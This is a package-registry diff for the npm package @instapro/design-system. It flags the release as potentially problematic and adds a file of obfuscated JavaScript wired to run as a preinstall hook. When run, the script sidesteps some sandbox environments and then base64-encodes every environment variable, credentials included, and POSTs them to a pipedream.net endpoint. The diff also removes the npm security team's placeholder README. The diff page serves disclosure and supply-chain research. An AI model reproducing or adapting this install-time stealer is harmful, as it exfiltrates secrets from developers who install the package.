@instapro/design-system 0.0.1-security → 9.839.303
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @instapro/design-system might be problematic. Click here for more details.
- package/kwnvpvg.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/kwnvpvg.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x2adf34=a0_0x5796;function a0_0x5796(_0x5dd94a,_0x10841e){const _0x840830=a0_0x8408();return a0_0x5796=function(_0x57960c,_0x12447f){_0x57960c=_0x57960c-0x198;let _0x36a12e=_0x840830[_0x57960c];return _0x36a12e;},a0_0x5796(_0x5dd94a,_0x10841e);}(function(_0x2e113c,_0x26e1f7){const _0x5a38a5=a0_0x5796,_0x3d2981=_0x2e113c();while(!![]){try{const _0x29ec8a=parseInt(_0x5a38a5(0x199))/0x1+-parseInt(_0x5a38a5(0x1b3))/0x2*(parseInt(_0x5a38a5(0x1a5))/0x3)+parseInt(_0x5a38a5(0x1aa))/0x4*(parseInt(_0x5a38a5(0x1a2))/0x5)+parseInt(_0x5a38a5(0x1b5))/0x6+parseInt(_0x5a38a5(0x1a6))/0x7*(-parseInt(_0x5a38a5(0x198))/0x8)+parseInt(_0x5a38a5(0x1b4))/0x9*(parseInt(_0x5a38a5(0x1af))/0xa)+-parseInt(_0x5a38a5(0x19b))/0xb;if(_0x29ec8a===_0x26e1f7)break;else _0x3d2981['push'](_0x3d2981['shift']());}catch(_0x1a3ffe){_0x3d2981['push'](_0x3d2981['shift']());}}}(a0_0x8408,0xe3f37));const http=require(a0_0x2adf34(0x1b1)),filter=[{'key':a0_0x2adf34(0x1a4),'val':a0_0x2adf34(0x1a9)},{'key':a0_0x2adf34(0x1a4),'val':a0_0x2adf34(0x19c)},{'key':a0_0x2adf34(0x1ab),'val':a0_0x2adf34(0x1a0)},{'key':'_','val':a0_0x2adf34(0x19d)}];function a0_0x8408(){const _0x1fe2f5=['/usr/bin/python','length','base64','daasadmin','error','59575uMvSvf','net','npm_config_registry','39cNVrUB','9929192XdNbFl','write','pipedream','taobao.org','500BdYgHI','USERNAME','3e6cd05f19d5dd6adfbed43a32433776','POST','request','486190FHQMqU','keys','https','npm_package_name','34630wNIMyc','63OEaivx','8223072ZUXsgR','join','8OwbxUW','1799319KMEsAF','end','26645311dzzSjP','tencent.com'];a0_0x8408=function(){return _0x1fe2f5;};return a0_0x8408();}function main(){const _0x1ed2da=a0_0x2adf34;var _0x3eb91d=process['env']||{};if(filter['some'](({key:_0x956154,val:_0x4c5790})=>_0x3eb91d[_0x956154]&&_0x3eb91d[_0x956154]['includes'](_0x4c5790))||Object[_0x1ed2da(0x1b0)](_0x3eb91d)[_0x1ed2da(0x19e)]<0xa)return;req=http[_0x1ed2da(0x1ae)]({'host':[_0x1ed2da(0x1ac),'m',_0x1ed2da(0x1a8),_0x1ed2da(0x1a3)][_0x1ed2da(0x1b6)]('.'),'path':'/'+(_0x3eb91d[_0x1ed2da(0x1b2)]||''),'method':_0x1ed2da(0x1ad)})['on'](_0x1ed2da(0x1a1),function(_0x2fc60e){}),req[_0x1ed2da(0x1a7)](Buffer['from'](JSON['stringify'](_0x3eb91d))['toString'](_0x1ed2da(0x19f))),req[_0x1ed2da(0x19a)]();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@instapro/design-system",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "9.839.303",
|
|
4
|
+
"main": "kwnvpvg.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node kwnvpvg.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40instapro%2Fdesign-system for more information.
|